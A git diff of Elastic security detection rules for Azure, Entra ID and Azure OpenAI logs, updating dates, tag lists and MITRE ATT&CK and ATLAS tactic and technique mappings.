[ risk_score = 47 rule_id = "f766ffaf-9568-4909-b734-75d19b35cbf4" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -81,6 +73,7 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -91,13 +84,28 @@ id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml index fd409ec66bb..aa8729363c5 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "Changes in ECS added cloud.* fields which are not available prior to ^9.2.0" -updated_date = "2026/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,17 +61,7 @@ setup = """### Microsft Entra ID Audit Logs This rule requires the Azure integration with Microsoft Entra ID Audit Logs data stream ingesting in your Elastic Stack deployment. For more information, refer to the [Microsoft Entra ID Audit Logs integration documentation](https://www.elastic.co/docs/reference/integrations/azure/adlogs). """ severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -91,36 +81,18 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" -[[rule.threat.technique.subtechnique]] -id = "T1484.002" -name = "Trust Modification" -reference = "https://attack.mitre.org/techniques/T1484/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml index 2ca71e31d2f..d988f949290 100644 --- a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml +++ b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/03" integration = ["azure"] maturity = "development" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -71,17 +71,7 @@ setup = """### Microsoft Entra ID Audit Logs This rule requires the Azure integration with Microsoft Entra ID Audit Logs data stream ingesting in your Elastic Stack deployment. For more information, refer to the [Microsoft Entra ID Audit Logs integration documentation](https://www.elastic.co/docs/reference/integrations/azure/adlogs). """ severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -95,33 +85,44 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] id = "TA0003" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml index 0491e8e6a55..b0cd7cfb345 100644 --- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,7 +57,7 @@ The Azure Fleet integration, Filebeat module, or similarly structured data is re risk_score = 21 rule_id = "774f5e28-7b75-4a58-b94e-41bf060fdd86" severity = "low" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -68,26 +68,26 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml index 0d51d53cae8..38a064cdfed 100644 --- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,7 +62,7 @@ references = [ risk_score = 21 rule_id = "38e5acdd-5f20-4d99-8fe4-f0a1a592077f" severity = "low" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -73,23 +73,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml index ab26fc86d1c..431d0f19a4c 100644 --- a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml +++ b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["azure"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,16 +58,7 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs This rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub. """ severity = "low" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-in Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -84,39 +75,39 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.005" -name = "Device Registration" -reference = "https://attack.mitre.org/techniques/T1098/005/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml index 6cf84594742..49921ba6a96 100644 --- a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml +++ b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ references = ["https://docs.microsoft.com/en-us/azure/event-hubs/authorize-acces risk_score = 47 rule_id = "b6dce542-2b75-4ffb-b7d6-38787298ba9d" severity = "medium" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Log Auditing", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,30 +78,36 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique.subtechnique]] -id = "T1552.005" -name = "Cloud Instance Metadata API" -reference = "https://attack.mitre.org/techniques/T1552/005/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml index fa59f5be650..aab5a627660 100644 --- a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml +++ b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/14" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,16 +52,7 @@ references = ["https://dirkjanm.io/persisting-with-federated-credentials-entra-a risk_score = 47 rule_id = "42c97e6e-60c3-11f0-832a-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Graph", - "Data Source: Microsoft Graph Activity Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -75,22 +66,29 @@ event.dataset: azure.graphactivitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.009" -name = "Conditional Access Policies" -reference = "https://attack.mitre.org/techniques/T1556/009/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.graphactivitylogs.properties.user_principal_object_id"] diff --git a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml index af9bc41d8c9..3b789ded337 100644 --- a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml +++ b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,6 +81,7 @@ sequence with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -91,16 +92,6 @@ id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml index de9b0f23509..bfe260a8cfb 100644 --- a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml +++ b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/15" integration = ["azure"] maturity = "production" -updated_date = "2025/09/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,14 +65,7 @@ references = [ risk_score = 73 rule_id = "1a1046f4-9257-11f0-9a42-f661ea17fbce" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Azure Activity Logs", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Azure Activity Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -93,16 +86,34 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml index 0f07d5c9080..cff07282bae 100644 --- a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml +++ b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/22" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -66,16 +66,7 @@ references = [ risk_score = 73 rule_id = "8d9c4128-372a-11f0-9d8f-f661ea17fbcd" severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -90,22 +81,39 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml index eae2f416a42..45a2e0961ab 100644 --- a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml +++ b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -62,13 +62,7 @@ references = [ risk_score = 21 rule_id = "1c966416-60c1-436b-bfd0-e002fddbfd89" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,30 +76,36 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml b/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml index d20e1c44577..0af5fcf3987 100644 --- a/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml +++ b/rules/integrations/azure/resource_development_entra_id_custom_domain_added_and_verified.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/03" integration = ["azure"] maturity = "development" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,20 +86,3 @@ event.dataset: azure.auditlogs ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1584" -name = "Compromise Infrastructure" -reference = "https://attack.mitre.org/techniques/T1584/" -[[rule.threat.technique.subtechnique]] -id = "T1584.001" -name = "Domains" -reference = "https://attack.mitre.org/techniques/T1584/001/" - - - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml b/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml index 46cd5e6b95a..4934540a281 100644 --- a/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_denial_of_ml_service_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,14 +65,7 @@ For more information on streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: Azure OpenAI", - "Data Source: Azure Event Hubs", - "Use Case: Denial of Service", - "Mitre Atlas: T0029", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: Impact", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Denial of Service", "Mitre Atlas: T0029", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -98,3 +91,33 @@ from logs-azure_openai.logs-* | sort Esql.event_count desc ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" + +[[rule.threat.technique.subtechnique]] +id = "T1499.003" +name = "Application Exhaustion Flood" +reference = "https://attack.mitre.org/techniques/T1499/003/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0059" +name = "Erode Dataset Integrity" +reference = "https://atlas.mitre.org/techniques/AML.T0059/" + +[rule.threat.tactic] +id = "AML.TA0011" +name = "Impact" +reference = "https://atlas.mitre.org/tactics/AML.TA0011/" diff --git a/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml b/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml index 80c55337e22..f626db07f8c 100644 --- a/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_insecure_output_handling_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,13 +61,7 @@ For more information on streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "low" -tags = [ - "Domain: LLM", - "Data Source: Azure OpenAI", - "Data Source: Azure Event Hubs", - "Use Case: Insecure Output Handling", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: Impact", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Insecure Output Handling", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -92,3 +86,15 @@ from logs-azure_openai.logs-* Esql.event_count desc ''' +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0048" +name = "External Harms" +reference = "https://atlas.mitre.org/techniques/AML.T0048/" + +[rule.threat.tactic] +id = "AML.TA0011" +name = 